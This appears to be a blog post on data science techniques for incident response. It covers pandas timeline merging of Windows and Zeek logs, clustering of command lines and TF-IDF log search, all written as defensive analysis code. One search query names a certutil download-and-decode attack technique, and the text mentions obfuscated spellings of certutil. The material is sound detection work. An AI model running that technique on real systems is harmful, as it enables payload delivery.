When you're three hours into an incident with three hundred thousand log lines, "look at the logs" is not an action plan. Data science techniques exist to reduce that problem to something tractable.
This isn't about replacing IR tools. It's about augmenting them with analysis patterns that handle scale, identify structure in noisy data, and compress the time between "data dump" and "here's what happened."
Timeline Reconstruction with Pandas
Building a complete attack timeline is often the first priority in IR. Evidence comes from multiple sources: Windows Security events, Zeek connection logs, Sysmon events, file system timestamps. Getting them into a single chronological view manually is error-prone.
pandas handles this well. The key is normalizing timestamps to UTC and merging sources on time:
import pandas as pd
from evtx import PyEvtxParser
import json
def load_windows_events(path, event_ids=None):
parser = PyEvtxParser(path)
records = [json.loads(r['data']) for r in parser.records_json()]
df = pd.json_normalize(records)
df['timestamp'] = pd.to_datetime(
df['Event.System.TimeCreated.#attributes.SystemTime'], utc=True
)
if event_ids:
df = df[df['Event.System.EventID'].isin(event_ids)]
return df
def load_zeek_conn(path):
with open(path) as f:
for line in f:
if line.startswith('#fields'):
cols = line.strip().split('\t')[1:]
break
df = pd.read_csv(path, sep='\t', comment='#', names=cols, na_values=['-', '(empty)'])
df['timestamp'] = pd.to_datetime(df['ts'], unit='s', utc=True)
return df
events = pd.concat([
load_windows_events('Security.evtx', event_ids=[4624, 4625, 4688]).assign(source='windows'),
load_zeek_conn('conn.log').assign(source='zeek'),
], ignore_index=True).sort_values('timestamp')
The source column preserves which log each event came from. Sort ascending and you have a cross-source timeline where credential logons (Event ID 4624) appear alongside the network connections they correspond to.
The common failure: mixing naive (no timezone) and tz-aware timestamps. Force UTC on every source at load time to avoid merge errors later.
Clustering to Group Related Activity
During triage, you often need to group a large number of related artifacts: commands executed, IPs contacted, file paths modified. Clustering finds structure that manual review misses at scale.
Suppose you pull a list of command-line executions from Sysmon Event ID 1 (MITRE ATT&CK T1059) and need to identify distinct malware families or attacker toolsets within them. TF-IDF vectors plus DBSCAN cluster similar commands without requiring a predefined number of clusters:
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import DBSCAN
from sklearn.preprocessing import normalize
vectorizer = TfidfVectorizer(analyzer='word', ngram_range=(1, 2), max_features=500)
X = vectorizer.fit_transform(df_cmds['cmdline'].fillna(''))
X_normalized = normalize(X)
db = DBSCAN(eps=0.3, min_samples=2, metric='cosine')
df_cmds['cluster'] = db.fit_predict(X_normalized)
for cluster_id in sorted(df_cmds['cluster'].unique()):
print(f"\nCluster {cluster_id}:")
print(df_cmds[df_cmds['cluster'] == cluster_id]['cmdline'].head(5).to_string())
eps=0.3 on cosine distance controls how similar two commands need to be to belong to the same cluster. Cluster -1 is DBSCAN's noise label for points that don't group with anything, which is often where the most unusual activity lives: attacker tooling that appeared once and doesn't resemble anything else in the dataset.
The same pattern applies to network activity: cluster destination IPs by shared ASN and reverse DNS patterns to separate C2 infrastructure from legitimate traffic, or cluster DNS queries by character entropy to identify DGA domain families (MITRE ATT&CK T1568.002).
NLP for Log Search at Scale
During IR, you often need to answer specific questions against log data that isn't well-indexed: find any reference to this hostname across all log sources, or find commands that resemble known credential-dumping patterns.
For structured logs with machine-parseable fields, SQL-style filtering works. For free-form log text (application logs, bash history, webserver access logs), TF-IDF similarity lets you find relevant entries against a natural-language query without requiring exact string matches:
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
import numpy as np
# log_lines: list of strings, one per log entry
vectorizer = TfidfVectorizer(analyzer='char_wb', ngram_range=(3, 4))
corpus_vectors = vectorizer.fit_transform(log_lines)
def search_logs(query, top_n=20):
query_vec = vectorizer.transform([query])
scores = cosine_similarity(query_vec, corpus_vectors)[0]
top_indices = np.argsort(scores)[::-1][:top_n]
return [(log_lines[i], round(scores[i], 3)) for i in top_indices if scores[i] > 0]
results = search_logs("certutil download base64 decode", top_n=25)
Character-level n-grams (char_wb, ngram_range=(3, 4)) are more tolerant of obfuscation than word-level tokenization. An attacker using cert util with a space, or CeRtUtIl with mixed case, still produces character trigrams that overlap with the query.
This doesn't replace a SIEM with proper full-text indexing. It's for working with log archives that aren't in your SIEM, with log types your SIEM can't parse, or in environments where your normal toolchain isn't accessible.
When Notebooks Become Evidence
Jupyter notebooks used during IR are analysis artifacts that can become case evidence. Document analytical decisions inside cells: why you applied a specific filter, what a cluster ID represents, which IOCs you excluded and why. Future analysts and legal counsel will need to follow your reasoning.
When converting findings to a report for stakeholders, nbconvert exports the notebook including all output:
jupyter nbconvert --to html ir_analysis_2026-05-01.ipynb --output-dir ./reports/
Keep both the raw notebook and the exported HTML. The HTML is for sharing; the notebook preserves the analysis logic for follow-up questions.
What This Doesn't Replace
These techniques are force multipliers, not substitutes for forensic tools. They don't replace Autopsy, Volatility, or Plaso. The pattern is: Plaso builds the timeline, pandas lets you filter and analyze it; Volatility extracts memory artifacts, Python processes what Volatility extracts.
The gap most IR teams have isn't in forensic tooling. It's in analyzing data at scale once it's collected. That's where data science skills pay off in IR work.
GTK Cyber's applied data science training covers these techniques hands-on, with labs built around realistic IR datasets and scenarios practitioners encounter in real investigations.
Top comments (0)